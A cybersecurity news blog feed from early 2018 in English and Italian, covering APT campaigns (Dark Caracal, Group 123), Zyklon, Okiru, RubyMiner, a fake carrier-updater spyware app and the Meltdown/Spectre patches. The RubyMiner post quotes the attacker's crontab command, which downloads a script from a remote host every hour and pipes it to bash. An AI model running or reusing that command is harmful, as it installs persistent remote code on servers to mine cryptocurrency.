Posts by CSECybSec

A new long-running player emerged in the cyber arena, it is the Dark Caracal APT, a hacking crew associated with to the Lebanese General Directorate of General Security that already conducted many stealth hacking campaigns.

Cyber spies belonging to Lebanese General Directorate of General Security are behind a number of stealth hacking campaigns that in the last six years, aimed to steal text messages, call logs, and files from journalists, military staff, corporations, and other targets in 21 countries worldwide.

New nation-state actors continue to improve offensive cyber capabilities and almost any state-sponsored group is able to conduct widespread multi-platform cyber-espionage campaigns.

This discovery confirms that the barrier to entry in the cyber-warfare arena has continued to
decrease and new players are becoming even more dangerous.

The news was reported in a detailed joint report published by security firm Lookout and digital civil rights group the Electronic Frontier Foundation.

The APT group was tracked as Dark Caracal by the researchers, its campaigns leverage a custom Android malware included in fake versions of secure messaging apps like Signal and WhatsApp.
“Lookout and Electronic Frontier Foundation (EFF) have discovered Dark Caracal2, a persistent and prolific actor, who at the time of writing is believed to be administered out of a building belonging to the Lebanese General Security Directorate in Beirut. At present, we have knowledge of hundreds of gigabytes of exfiltrated data, in 21+ countries, across thousands of victims. Stolen
data includes enterprise intellectual property and personally identifiable information.” states the report.

The attack chain implemented by Dark Caracal relies primarily on social engineering, the hackers used messages sent to the victims via Facebook group and WhatsApp messages. At a high-level, the hackers have designed three different kinds of phishing messages to trick victims into visiting a compromised website, a typical watering hole attack.

 Dark caracal

 

The malicious app could exfiltrate text messages, including two-factor authentication codes, and other data from the victim’s device. Dark Caracal malware is also able to use devices cameras and the microphone to spy on the victims.

Unfortunately, the APT group also used another powerful surveillance software in its campaign, the malware is the dreaded FinFisher, a spyware that is often marketed to law enforcement and government agencies.

Lookout and the EFF launched their investigation in July 2017, the researchers were able to identify the Command and Control infrastructure and determined that the Dark Caracal hackers were running six unique campaigns. Some of the hacking campaigns had been ongoing for years targeting a large number of targets in many countries, including China, the United States, India, and Russia.

“Since we first gained visibility into attacker infrastructure in July 2017, we have seen millions of requests being made to it from infected devices. This demonstrates that Dark Caracal is likely running upwards of six distinct campaigns in parallel, some of which have been operational since January 2012. Dark Caracal targets a broad range of victims.” states the analysis. “Thus far, we have identified members of the military, government officials, medical practitioners, education professionals, academics, civilians from numerous other fields, and commercial enterprises as targets.”

 Further details are provided in the technical report that includes more than 90 indicators of
compromise (IOC).

Pierluigi Paganini

(Security Affairs – Dark Caracal, APT)

The post Dark Caracal APT – Lebanese intelligence is spying on targets for years appeared first on Security Affairs.

Intel has published the results of the test conducted on the Meltdown and Spectre patches and their impact on performance confirming serious problems.

According to the tech giant systems with several types of processors running Meltdown and Spectre patches may experience more frequent reboots.

A few days ago Intel reported that extensive test conducted on home and business PCs demonstrated a negligible performance impact on these types of systems (from 2 up to 14%).

Now the vendor has conducted some performance tests on data centers and results show that the impact on the performance depends on the system configuration and the workload.

“As expected, our testing results to date show performance impact that ranges depending on specific workloads and configurations. Generally speaking, the workloads that incorporate a larger number of user/kernel privilege changes and spend a significant amount of time in privileged mode will be more adversely impacted.” reads the analysis conducted by Intel.

Impacts ranging from 0-2% on industry-standard measures of integer and floating point throughput, Linpack, STREAM, server-side Java and energy efficiency benchmarks. The tests are related to benchmarks that cover typical workloads for enterprise and cloud customers.

Intel also evaluated the impact on online transaction processing (OLTP), estimating it at roughly 4%.

Benchmarks for storage demonstrated a strict dependence on the benchmark, test setup, and system configuration.

For FlexibleIO, which simulates various I/O workloads, throughput performance decreased by 18% when the CPU was stressed, but there was no impact when CPU usage was low.

The tests for FlexibleIO were conducted using different benchmark simulating different types of I/O loads, the results depend on many factors, including read/write mix, block size, drives and CPU utilization.

“For FlexibleIO, a benchmark simulating different types of I/O loads, results depend on many factors, including read/write mix, block size, drives and CPU utilization. When we conducted testing to stress the CPU (100% write case), we saw an 18% decrease in throughput performance because there was not CPU utilization headroom.” continues the analysis. “When we used a 70/30 read/write model, we saw a 2% decrease in throughput performance. When CPU utilization was low (100% read case), as is the case with common storage provisioning, we saw an increase in CPU utilization, but no throughput performance impact.”

The most severe degradation of the performance was observed during Storage Performance Development Kit (SPDK) tests, using iSCSI the degradation reached 25% when only a single core was used. Fortunately, there was no degradation of the performance when SPDK vHost was used.

Meltdown and Spectre patches 

Intel also reported that Meltdown and Spectre patches are causing more frequent reboots, this behavior was observed for systems running Broadwell, Haswell, Ivy Bridge-, Sandy Bridge-, Skylake-, and Kaby Lake-based platforms.

“We have reproduced these issues internally and are making progress toward identifying the root cause. In parallel, we will be providing beta microcode to vendors for validation by next week,” said Navin Shenoy, executive vice president and general manager of Intel’s Data Center Group.

Only the newest Intel 8th-gen CPUs Coffee Lake seems to be not affected by reboots.

Pierluigi Paganini

(Security Affairs – Meltdown and Spectre patches, Intel)

The post Meltdown and Spectre patches have a variable impact and can cause unwanted reboots, Intel warns appeared first on Security Affairs.

North Korean hackers belonging to the North Korea Group 123 have conducted at least six different massive malware campaigns during 2017.

North Korean hackers have conducted at least six different massive malware campaigns during 2017, most of them against targets in South Korea. Security researchers from Cisco’s Talos group who have monitored the situation for 12 months have identified a North Korean threat actor tracked by the experts as Group 123 that conducted numerous malware attacks against entities in the South.

In three differed phishing campaigns tracked as “Golden Time”, “Evil New Year” and “North Korean Human Rights” South Korean victims were specifically infected with the Remote Access Trojan ROKRAT.

“On January 2nd of 2018, the “Evil New Year 2018” was started. This campaign copies the approach of the 2017 “Evil New Year” campaign.

The links between the different campaigns include shared code and compiler artifacts such as PDB (Program DataBase) patterns which were present throughout these campaigns.” reads the analysis published by Talos.

“Based on our analysis, the “Golden Time”, both “Evil New Year” and the “North Korean Human Rights” campaigns specifically targeted South Korean users.”

The ROKRAT RAT was used to target Korean targets using the popular Korean Microsoft Word alternative Hangul Word Processor (HWP). In the past, we saw other attacks against people using the HWP application.

ROKRAT RAT

The three campaigns leveraged on a payload in the Hancom Hangul Office Suite, North Korean hackers exploited vulnerabilities such as the CVE-2013-0808 EPS viewer bug to deliver the RAT.

The attackers also used specially crafted files to trigger the arbitrary code execution vulnerability CVE-2017-0199. Group 123 also launched the FreeMilk campaign against financial institutions outside South Korea.

The hackers in this campaign used phishing message with a weaponized Microsoft Office document that was able to trigger the vulnerability CVE-2017-0199.

“Group 123 used this vulnerability less than one month after its public disclosure. During this campaign, the attackers used 2 different malicious binaries: PoohMilk and Freenki.” continues the analysis.”PoohMilk exists only to launch Freenki. Freenki is used to gather information about the infected system and to download a subsequent stage payload. This malware was used in several campaigns in 2016 and has some code overlap with ROKRAT.”

The last campaign analyzed by Talos group was tracked as “Are You Happy,”  it is a sabotage campaign that targeted the victims using a module from ROKRAT designed to wipe the first sectors of the victim’s hard drive.

According to Talos, this actor was very active in 2017, and likely will continue its campaigns in the next months, especially against targets in the South.

“The actor has the following demonstrated capabilities:

  • To include exploits (for Hangul and Microsoft Office) in its workflows.
  • To modify its campaigns by splitting the payload in to multiple stages
  • To use compromised web servers or legitimate cloud based platforms.
  • To use HTTPS communications to make it harder to perform traffic analysis.
  • To compromise third parties to forge realistic spear phishing campaigns (i.e. Yonsei university in the “Golden Time” campaign).
  • To constantly evolve, the new fileless capability included in 2018 is a proof.” concluded Talos.

north korea phishing campaigns

The report includes the IoCs for each campaign.

Pierluigi Paganini

(Security Affairs – South Korea, Group 123)

The post North Korea Group 123 involved in at least 6 different hacking campaigns in 2017 appeared first on Security Affairs.

Security experts from FireEye have spotted a new strain of the Zyklon malware that has been delivered by using new vulnerabilities in Microsoft Office.

Researchers at FireEye reported the malware was used in attacks against organizations in the telecommunications, financial, and insurance sectors.

Zyklon has been spotted for the first time in 2016, it is a publicly available malware that could be used for multiple purposes such as espionage campaigns, DDoS attacks or to mine cryptocurrency.

“FireEye researchers recently observed threat actors leveraging relatively new vulnerabilities in Microsoft Office to spread Zyklon HTTP malware.” reads the analysis published by FireEye.

“Zyklon is a publicly available, full-featured backdoor capable of keylogging, password harvesting, downloading and executing additional plugins, conducting distributed denial-of-service (DDoS) attacks, and self-updating and self-removal.”

The malware is modular, it can download several plugins to implement different features, it may communicate with C&C server over The Onion Router (Tor) network.

In this last campaign, the malicious code has been delivered via spam emails using as a ZIP archive that contains a specially crafted Word document.

The document exploits one of three vulnerabilities in Microsoft Office to deliver a PowerShell script that downloads the final Zyklon payload from a remote server.

Zyklon malware

One of the flaws exploited by the attackers is CVE-2017-8759, a flaw that was fixed by Microsoft in September 2017 after it was exploited by threat actors such as the Cobalt group to deliver malware in attacks wild.

A second triggered by the documents used in the campaign spotted by FireEye is CVE-2017-11882, a 17-year-old vulnerability in MS Office that could be exploited by remote attackers to install a malware without user interaction.
The flaw is a memory-corruption issue that affects all versions of Microsoft Office released in the past 17 years, including the latest Microsoft Office 365. The vulnerability could be triggered on all versions of Windows operating system, including the latest Microsoft Windows 10 Creators Update.

The vulnerability affects the MS Office component EQNEDT32.EXE that is responsible for insertion and editing of equations (OLE objects) in documents.

This flaw was used by differed APT groups, including the Cobalt group and Iran-linked hackers.

The attackers also exploited the Dynamic Data Exchange (DDE) feature in Office to deliver the malicious code, the same feature was abused by at least one Russian APT group in cyber espionage campaigns and by the powerful Necurs botnet to deliver ransomware.

Once the malware has successfully exploited one of these flaws, it will download a PowerShell script that injects code and fetches the final payload from a remote server.

FireEye highlighted the fact that attackers are exploiting recently discovered flaws in widely adopted software such as the Office suite to increase the likelihood of infecting the victims’ machines.

“Threat actors incorporating recently discovered vulnerabilities in popular software – Microsoft Office, in this case – only increases the potential for successful infections. These types of threats show why it is very important to ensure that all software is fully updated. Additionally, all industries should be on alert, as it is highly likely that the threat actors will eventually move outside the scope of their current targeting.” concludes FireEye.

Technical details about the threat, including the Indicators of Compromise, are available in the report published by FireEye.

Pierluigi Paganini

(Security Affairs –Zyklon malware, Office)

The post Threat actors are delivering the Zyklon Malware exploiting three Office vulnerabilities appeared first on Security Affairs.

The Briton Goncalo Esteves (24), also known as KillaMuvz, has pleaded guilty to charges related to creating and running malware services.

“A cyber criminal has admitted running a product-testing service for hackers following a joint investigation by the National Crime Agency (NCA) and cyber security firm Trend Micro.

Goncalo Esteves, 24, of Cape Close, Colchester, Essex, ran the website reFUD.me, which allowed offenders to test, for a fee, whether their malicious cyber tools could beat anti-virus scanners.” reads the announcement published by the NCA.

“Under the pseudonym KillaMuvz, he also sold custom-made malware-disguising products and offered technical support to users.

He pleaded guilty to two computer misuse offences and a count of money laundering at Blackfriars Crown Court.”

Esteves advertised his service on the hackforums.net website, a well-known crime messageboard.

“A free service that offers fast and reliable file scanning to ensure that your files remain fully undetectable to anti-malware software.” reads the ad.

The NCA reported that Esteves made £32,000 from more than 800 Paypal transactions between 2011 and 2015.

There are no other information about the transactions made in Bitcoins and using Amazon vouchers.

The post KillaMuvz, the creator of the Cryptex tool family pleads guilty to running malware services appeared first on Security Affairs.

La rete mondiale è minacciata da un malware

Articolo di Arturo Di Corinto da AGI del 15 gennaio 2018

La rete mondiale è minacciata da un malware di cui si sa pochissimo. Cos’è Okiru.

 

Si chiama Okiru la nuova minaccia mondiale alla vita digitale. Ad annunciarla su Twitter è il team di ricerca noto come MalwareMustDie e potrebbe essere perfino peggiore del suo ceppo madre: la Botnet Mirai che dall’omonimo malware ha preso il nome. Okiru è in effetti una variante del malware Mirai, un codice malevolo che si diffonde sfruttando falle note e configurazioni non corrette dei dispositivi dell’Internet delle Cose.

Il target di Okiru sono infatti i miliardi di microprocessori ARC che fanno girare l’Internet delle Cose basate sulla famiglia di sistemi operativi Linux e, se usato, potrebbe dare inizio a un’epidemia di attacchi informatici sferrati da frigoriferi, auto e televisori difficile da fronteggiare.

Come gli altri malware di questo tipo Okiru è infatti in grado di prendere il controllo dei dispositivi che infetta e reclutarli all’interno di una rete di computer zombie (che ne prende il nome), “risvegliandogli” contemporaneamente per portare attacchi su specifici target, in particolare attacchi DDoS (Distributed Denial of Service, attacco distribuito da negazione di servizio) che ingolfano servizi legittimi e li fanno collassare per l’elevato numero di richieste contemporanee.

Così, dopo l’allarme di pochi giorni fa circa le vulnerabilità individuata nell’hardware dei processori Intel e AMD, questo nuovo alert ha messo in subbuglio tutto il mondo della cybersecurity mondiale.

MalwareMustDie, lo scopritore

Individuata dallo stesso ricercatore che nel 2016 per primo aveva individuato Mirai, @unixfreaxjp del gruppo @MalwareMustDie, questo nuovo malware non viene trovato dalla maggior parte dei sistemi antivirus avendo una elevata capacità di offuscamento.

Per capire i possibili danni derivanti da un’attivazione mirata di una botnet basata su Okiru basti ricordare che Mirai, la botnet che nell’ottobre del 2016 ha messo in ginocchio i server della società Dyn aveva causato il blackout di molti siti e servizi sulla costa orientale americana rendendo irraggiungibile anche il New York Times online, Amazon e Twitter. All’epoca la Mirai botnet responsabile dello “Internet outtage” aveva utilizzato circa 100.000 telecamere connesse a Internet basate su schede della cinese XiongMai Technologies, tutte con lo stessa username e password.

Nel caso di Okiru potrebbe accadere lo stesso. Questo tipo di malware esamina la rete alla ricerca di dispositivi visibili e quando trova un dispositivo IoT vulnerabile, lo infetta automaticamente e lo aggiunge al suo esercito botnet grazie alla capacità di generare le password per perderne il controllo, e sfruttando il fatto che spesso login e password dei dispositivi attaccati sono quelli decisi dal fabbricante e quasi mai cambiati dagli utilizzatori. Una volta reclutati questi dispositivi possono essere “risvegliati” per un attacco DDoS su larga scala.

Una botnet dagli effetti potenzialmente devastanti

In dicembre era stata scoperta un’altra variante di Mirai, la botnet Satori, utilizzata per colpire i router della cinese Huawei.

Okiru però, non solo si distingue per l’obiettivo dell’attacco, bensì anche per caratteristiche tecniche rispetto alle versioni di Mirai come Satori.

E in effetti l’impatto potrebbe essere devastante visto che, come ha stimato Odisseus, il ricercatore avvisato da MalwareMustDie e che ha dato per primo l’allarme in tandem con l’italiano Pierluigi Paganini, l’impatto di questa botnet potrebbe essere devastante perché i processori barsaglio vengono venduti in tutto il mondo al numero di un miliardo e mezzo all’anno.

Gli “ARC (Argonaut RISC Core) sono infatti una famiglia di processori a 32-bit emebedded progettati da ARC International e sono ampiamente usati nei settori casa, automotive, mobile e nelle applicazioni IoT (Internet of Things).

Secondo MalwareMustDie “questa variante di #Mirai, #Okiru è pericolosissima perché gli sono state apportate modifiche rilevanti nel codice, nella capacità di generare password e nel suo offuscamento crittografico”.

Pierluigi Paganini, CTO di CSE Cybsec ha dichiarato che “con la scoperta di Okiru sappiamo che qualcuno che brandisce un cannone con centinaia di migliaia di dispositivi compromessi potrebbe colpire una qualunque infrastruttura in rete”, e ha anche denunciato il fatto che appena ha divulgato la notizia con un post, dopo 20 minuti il suo sito è stato colpito da un DDoS, un attacco da negazione di servizio a carattere dimostrativo che lo ha reso inservibile per qualche tempo nonostante fosse protetto da un apposito servizio anti DDoS.

I ricercatori del team MalwareMustDie hanno per questi motivi deciso di pubblicare le cosiddette “Yara rules” per meglio affrontare il pericolo. Le regole Yara sono un insieme di stringhe informatiche ed espressoni booleane che descrivono il comportamento dei malware e permettono di attuare le contromisure e loro le hanno caricate su GitHub, il repositorio libero di codice informatico, a beneficio di tutti, ma solo dopo avere segnalato gli indicatori di compromissione per capire se il proprio dispositivo è infetto.

Violato l’account email del premier britannico

Articolo di Arturo Di Corinto da LA REPUBBLICA del 16 ottobre 2017

Violato l’account email del premier britannico. Sospetti su hacker iraniani

L’ACCOUNT email del premier Theresa May è stato violato da hacker iraniani. A confermarlo è un rapporto dei servizi segreti di sua Maestà. I fatti risalgono al 23 giugno scorso ma solo oggi la stampa britannica ne ha dato notizia. Gli account violati sarebbero ben 9000 e almeno 100 appartengono a ministri e parlamentari britannici. Secondo gli esperti, l’attacco ha usato tecniche di “brute force”, ovvero un tipo di attacco che esplora con sofisticati software tutte le combinazioni possibili delle password che proteggono sistemi e account informatici fino ad arrivare a quella corretta. Non si tratta del tipico di attacco usato dagli hacker governativi (nation state hackers) che in genere hanno nel loro arsenale cyber-armi più sofisticate, pertanto le prime ipotesi vanno nella direzione di attività di spionaggio su larga scala forse anche di tipo commerciale. E tuttavia il rapporto dell’intelligence attribuisce l’accaduto ad hacker iraniani. Sono infatti diverse le fonti che ritengono che nel panorama ‘cyber’ gli attacchi riconducibili ad attori iraniani siano imputabili a gruppi legati al governo di Rohani. Ma è ancora presto per dire se si tratti di hacker al soldi di stati stranieri o cani sciolti.

Secondo Pierluigi Paganini, Chief Technology Officer di CSE cybsec, “negli ultimi sei mesi abbiamo assistito a un’escalation di cyberattacchi provenienti dall’Iran e le aree prese di mira sono quelle del Medio Oriente, ad esempio da parte del gruppo noto come OilRig. Quello che abbiamo osservato inoltre, è che tali gruppi stanno mutando il loro modus operandi. Usano tattiche diverse in funzione degi obiettivi che si sono dati, come ad esempio i miglioramenti nelle tecniche di offuscamento del malware”.

La notizia dell’attacco che forse potrebbe essere derubricata come l’ennessima intrusione nei computer di politici poco attenti alla protezione dei dati sensibili delle loro attività acquisisce oggi un nuovo significato in relazione alla situazione geopolitica del momento e alla minaccia di Trump di decertificare l’accordo nucleare iraniano. Una decisione contestata dagli stessi alleati degli Usa e dai partner europei tra cui proprio l’Inghilterra, che si è da poco pronunciata con una dichiarazione favorevole all’Iran.

I contenuti delle email violate sono tuttora segretati, ma sicuramente c’è del materiale sensibile che potrebbe servire a ulteriori violazioni di sicurezza secondo le modalità tipiche di quegli hacker che utilizzano ogni singolo pezzo di informazione per profilare i soggetti target e portare attacchi più dannosi all’organizzazione di cui le vittime fanno parte. E questo sopratutto grazie al fatto
che nonostante le violazioni ripetute di database bancari e governativi e degli account degli Internet provider il livello di attenzione è ancora molto basso, tanto che account così sensibili non sono protetti da un doppio fattore di autenticazione come vorrebbe il comune buon senso.

App Android è uno spyware che ti ruba i dati

Articolo di Arturo Di Corinto, LA REPUBBLICA del 4 dicembre 2017

App Android promette di aggiornare il tuo telefono 3, ma è uno spyware che ti ruba i dati

 

UNO spyware molto potente sta infettando in queste ore i cellulari della 3 con sistema operativo Android, riuscendo a inserirsi nella rubrica dei contatti e a leggere il contenuto di app come Instagram, Snapchat, Whatsapp, perfino Telegram, prima che il software possa cifrarne il contenuto. Anch’esso sotto forma di app, lo spyware sfrutta un vecchio trucco, far credere all’utente che l’applicazione faccia qualcosa di utile. 3 Mobile Updater è però in questo caso un’app malevola per Android travestita in modo da apparire come un’applicazione legittima per aggiornare i cellulari della 3 e utilizza perfino il logo di TRE Italia per convincere le vittime a fidarsi e utilizzarla.

I ricercatori che l’hanno scoperta nel laboratorio malware di CSECybsec, lo Zlab, hanno pubblicato da qualche ora il report con la descrizione del comportamento del malware. Si chiama “Fake 3MobileUpdater” ed è scaricabile in formato PDF dal sito della società di cybersecurity. Nel rapporto si sottolinea che una volta lanciata l’app presenta all’utente un messaggio che lo invita ad attendere che venga completato l’aggiornamento. Nel frattempo però l’app contatta un server canaglia al quale invia informazioni sul dispositivo compromesso e resta in attesa di istruzioni.

Come riporta anche il bollettino online del Cert PA – il computer emergency response team presso l’Agenzia per l’Italia digitale (AGID) – il malware è in grado di utilizzare la fotocamera del dispositivo su cui è installato, carpire informazioni da Whatsapp, Telegram, Skype, Instagram, Snapchat, sottrarre le foto dalla galleria, leggere gli SMS e accedere al registro delle chiamate. Ma la vera novità è che si tratterebbe di un malware sviluppato in Italia. Dall’analisi del codice emergono diverse stringhe scritte in lingua italiana, ragione per cui i ricercatori di ZLab hanno ipotizzato che il malware sia stato scritto da sviluppatori italiani con lo scopo di prendere di mira gli utenti della compagnia telefonica Tre, “forse addirittura alcuni specifici utenti”. E tuttavia il fatto di aver individuato nel codice stringhe come “TEST” fa presupporre che il malware sia ancora in piena fase di sviluppo. Il consiglio dei ricercatori è quindi di non installare né usare l’app, la quale non è disponibile sugli store ufficiali Android e Apple dove l’app ufficiale di customer care per i clienti 3 si chiama Area Clienti 3.

Secondo Pierluigi Paganini, cybersecurity officer di  CSECybsec, “nel codice sono presenti molte stringhe in Italiano, ed il fatto che siano stati presi di mira gli utenti della Tre Italia conferma la tesi che dietro vi sia un gruppo di sviluppo del nostro Paese”. Inoltre, continua l’esperto, “il server utilizzato per controllare l’app ed impartire ordini è riconducibile ad un’azienda Italiana che opera nel settore della cyber security, ciò tuttavia non rappresenta un elemento certo di attribuzione di colpevolezza. I suoi sistemi infatti potrebbero stati hackerati. Nel report abbiamo omesso il nome dell’azienda per dare modo ai suoi rappresentanti di chiarire la posizione nella vicenda”.

La diffusione del rapporto ha anticipato di qualche ora le dichiarazioni del prefetto Alessandro Pansa sul “rischio cyber”. Proprio oggi, in coincidenza con il lancio del nuovo sito della Cyberchallenge, la competizione che seleziona i migliori talenti hacker italiani, il direttore generale del Dipartimento delle informazioni per la sicurezza, nel suo intervento alla cerimonia per il decennale della riforma dell’intelligence all’Auditorium Parco della Musica di Roma ha sottolineato l’importanza del fatto che i giovani siano “utenti consapevoli delle nuove tecnologie, che sviluppino autonome capacità di giudizio, ed anche, quando necessario, di autodifesa” e ha preannunciato una grande iniziativa per favorire la formazione dei giovani alla cybersecurity. La cerimonia si è svolta alla presenza del presidente della Repubblica Sergio Mattarella e del presidente del Consiglio Paolo Gentiloni.

Tutti i computer a rischio per un baco nel processore

Articolo di Virginia Della Sala

Tutti i computer a rischio per un baco nel processore

Tutti i processori del mondo sono in pericolo”. “La più grave falla degli ultimi anni”. Sì, perché per risolverla completamente si dovrebbe cambiare pc, gli aggiornamenti potrebbero non bastare. È questo il tono dei titoli che ieri sono circolati online dopo la scoperta di una falla, anzi tre, che potrebbero appunto riguardare la quasi totalità dei pc e dispositivi in circolazione e che ha scosso il mondo tecnologico e dell’hi-tech perché riguarda i tre colossi dei microchip a livello mondiale – Intel, Amd e Arm – ed espone ad attacchi informatici e al furto di dati e password i congegni che hanno installati al loro interno questi processori.

LA FALLA chiamata “Meltdown”, interessa Intel ed è stata individuata in modo indipendente da tre gruppi di ricercatori (Politecnico austriaco di Graz, la società tedesca Cerberus e il Project Zero di Google). La seconda, “Spectre”, coinvolge invece sia Intel che Arm e Amd ed è stata rivelata dal team di Google.

DI COSA SI PARLA. Il problema interessa i processori dei dispositivi prodotti negli ultimi dieci anni, le cosiddette Cpu, l’unità centrale di governo di qualsiasi. Va immaginata come il cervello della macchina, che dà impulso a tutte le sue funzioni. “Il baco identificato dai ricercatori sfrutta la possibilità di far sì che un’applicazione non si limiti a gestire lo spazio di memoria a essa assegnato, ma gestisca anche quelli relativi all’intero sistema operativo”, spiega Pierluigi Paganini ad di CSE Cybsec. Significa, con una traduzione semplice, che con un attacco effettuato attraverso qualsiasi applicazione o qualsiasi parte del pc, si potrebbe accedere a tutta la memoria della macchina e quindi a tutte le informazioni in essa contenute.

I VASI. I pc hanno dei comparti al loro interno e le applicazioni che li compongono possono accedere solo agli spazi di me- moria che li riguardano, a meno che non ci siano dei procedimenti prestabiliti e preconfigurati dal produttore. Con questa falla, invece, di fatto queste memorie diventano comunicanti e quindi con un accesso attraverso la debolezza della cpu, si può estorcere di tutto: password incluse. “Ed è possibile farlo anche con metodi abbastanza semplici”, spiega Paganini.

ATTACCHI. Non ci sono prove che la debolezza non sia già stata sfruttata da hacker e pirati informatici. Di sicuro quasi tutti gli sviluppatori dei sistemi operativi hanno realizzato e rilasciato una patch, un rattoppo e quindi un aggiornamento, che possa schermare da eventuali attacchi. Ma si tratta di una soluzione che interviene sul software, quindi sulla parte immateriale del pc, e non sull’hardware (la parte fisica, il chip vero e proprio) che continueranno a essere difettosi. “Così come sono – spiega Paganini – se ci si volesse rendere non vulnerabile agli attacchi si dovrebbe riprogettare il chip”. Forbes ieri ha poi rilevato che la patch potrebbe rallentare le performance della Cpu dal 5 al 30%.

AGGIORNAMENTI. Ieri Microsoft ha rilasciato l’aggiornamento per Windows 10 e nei prossimi giorni dovrebbe arrivare quello per le versioni precedenti. Apple ha rilasciato l’aggiornamento 10.13.2 di MacOS e Google quelli per Android e Chrome OS. I rischi potrebbero riguardare infatti sia i pc che tablet, smartphone e oggetti smart.

I SOSPETTI. Sempre Forbes alimenta anche il sospetto che i vertici di Intel sapessero da tempo del difetto, facendo riferimento al caso dell’Ad della società, Brian Krzanich, che a metà dicembre ha venduto tutte le azioni che poteva (ne possedeva 495.743 ed è rimasto con il minimo previsto per statuto di 250 mila). Ipotesi smentita da un portavoce dell’azienda. Secondo i documenti, la vendita dei titoli era parte di un piano creato un mese prima.

Security researchers at Check Point have spotted a malware family dubbed RubyMiner that is targeting web servers worldwide in an attempt to exploit their resources to mine Monero cryptocurrency.

RubyMiner, was first spotted last week when a massive campaign targeted web servers worldwide, most of them in the United States, Germany, United Kingdom, Norway, and Sweden.

The experts believe that a single lone attacker is behind the attacks, in just one day he attempted to compromise nearly one-third of networks globally.

“In the last 24 hours, 30% of networks worldwide have experienced compromise attempts by a crypto-miner targeting web servers.” read the analysis from Check Point.

“During that period, the lone attacker attempted to exploit 30% of all networks worldwide to find vulnerable web servers in order to mobilize them to his mining pool. Among the top countries targeted are the United States, Germany, United Kingdom, Norway and Sweden, though no country has gone unscathed.”

RubyMiner

The malware targets both Windows and Linux servers, attempting to exploit old vulnerabilities in PHP, Microsoft IIS, and Ruby on Rails to deploy the Monero miner.

The Italian security firm Certego noticed the same attacks that began on January 10.

“Our threat intelligence platform has been logging a huge spike in ruby http exploiting since yesterday (10 January) at 23:00.” states the report published by Certego.

“The exploit has been trying to leverage a fairly old CVE (CVE-2013-0156) that allows remote code execution. The following public Emerging Threat signature cover the exploit:”

The attack doesn’t appear very sophisticated, the hacker did not attempt to conceal his operations, but it was focused on infecting the larger number of servers in the shortest time.

“Surprisingly, by using old vulnerabilities published and patched in 2012 and 2013, it doesn’t seem that stealth was part of the attacker’s agenda either. Instead, the attacker chose to exploit multiple vulnerabilities in HTTP web servers, to distribute an open source Monero miner – XMRig.” continues the analysis.

“In fact, XMRig usually sends a donation of 5% of the revenue gained from the mining process to the code’s author. However, even this amount was too much for the attacker to part with as that ‘donation element’ was deleted from the code, giving the enthusiast 100% of the profit.”

At the time of the report, only 700 servers worldwide have been successfully compromised in the first 24 hours of attacks.

The experts from Certego observed the attacker exploiting the CVE-2013-0156 remote code execution flaw in Ruby on Rails.

The attacker sends a base64 encoded payload inside a POST request in the attempt to trick the interpreter into executing it.

The malicious payload is a bash script that adds a cronjob that runs every hour and downloads a robots.txt file containing a shell script, used to fetch and execute the cryptominer. The scheduler is being told to run the whole process, including downloading the file from the server every hour.

“The cron is a UNIX based scheduler which allows running scheduled tasks at fixed times via its own syntax. Running the crontab command with the –r argument will remove all existing tasks in the existing crontab and allow for the miner to take full priority.” continues the analysis from Checkpoint.

echo “1 * * * * wget -q -O – http://internetresearch.is/robots.txt 2>/dev/null|bash >/dev/null 2>&1″|crontab –   

“Now the attacker can inject the new job to the clean crontab file using the “1 * * * *” which will tell the scheduler to run once an hour for one minute infinitely.

The new job will download and execute the “robots.txt” file hosted on “internetresearch.is.” and the mining process can begin.”

Experts believe that the robots.txt file could be used also as a kill switch for RubyMiner,  modify the robots.txt file on the compromised webserver it is possible to deactivate the malware.

“Within a minute, all the machines re-downloading the file will be receiving files without the crypto miners,” Check Point notes.

The expert noticed that one of the domains used by the attacker, lochjol.com, was involved in an attack that abused the Ruby on Rails vulnerability in 2013.

Check Point researchers also published the IoC related to RubyMiner.

Pierluigi Paganini

(Security Affairs –Monero Miner, RubyMiner)

The post RubyMiner Monero Cryptominer affected 30% of networks worldwide in just 24h appeared first on Security Affairs.